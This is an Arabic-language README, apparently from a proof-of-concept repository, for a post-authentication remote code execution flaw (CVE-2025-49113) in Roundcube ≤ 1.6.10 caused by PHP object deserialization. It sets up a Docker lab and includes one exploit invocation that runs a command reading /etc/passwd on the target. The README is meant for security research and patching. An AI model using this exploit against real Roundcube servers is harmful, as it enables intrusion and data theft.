
استغلال تنفيذ الأوامر عن بُعد (RCE) بعد المصادقة لـ Roundcube ≤ 1.6.10 عبر إلغاء تسلسل كائنات PHP، مع إعداد مختبر قائم على Docker وشرح تقني لأغراض البحث الأمني والتعليم.
تم اكتشاف ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) بعد المصادقة في Roundcube (الإصدارات ≤ 1.6.10)، ناتجة عن إلغاء تسلسل غير آمن لكائنات PHP. وقد استمرت هذه الثغرة الخطيرة بصمت في قاعدة الشيفرة لأكثر من 10 سنوات.
للحصول على الشرح الفني الكامل وتفاصيل الاستغلال، تفضل بزيارة:
👉 https://fearsoff.org/research/roundcube
سيؤدي هذا إلى تثبيت Ubuntu 24.04 وRoundcube وجميع التبعيات الضرورية داخل حاوية Docker:
docker run --name ubuntu24 \
-p 9876:80 \
-v "$PWD/rc_install.sh":/root/rc_install.sh \
-it ubuntu:24.04 \
bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"
⚠️ ملاحظة: استخدم فقط في البيئات المعزولة. لا تعرض الأنظمة المعرضة للخطر على شبكة الإنترنت العامة.
هذا الكود البرمجي لإثبات المفهوم مُقدَّم للأغراض التعليمية والبحثية فقط. لا يتحمل المؤلف والمساهمون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن استخدام هذا الكود. الاستخدام غير المصرح به على أنظمة لا تملكها أو لا تملك إذنًا صريحًا لاختبارها يُعد غير قانوني وممنوعًا تمامًا.
تأكد من تثبيت php على النظام
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"
إذا كنت تشغّل Roundcube ≤ 1.6.10، فحدّث إلى أحدث إصدار مصحح فورًا للقضاء على هذه الثغرة.
يتم توفير هذا المشروع والوثائق المرتبطة به بموجب رخصة MIT.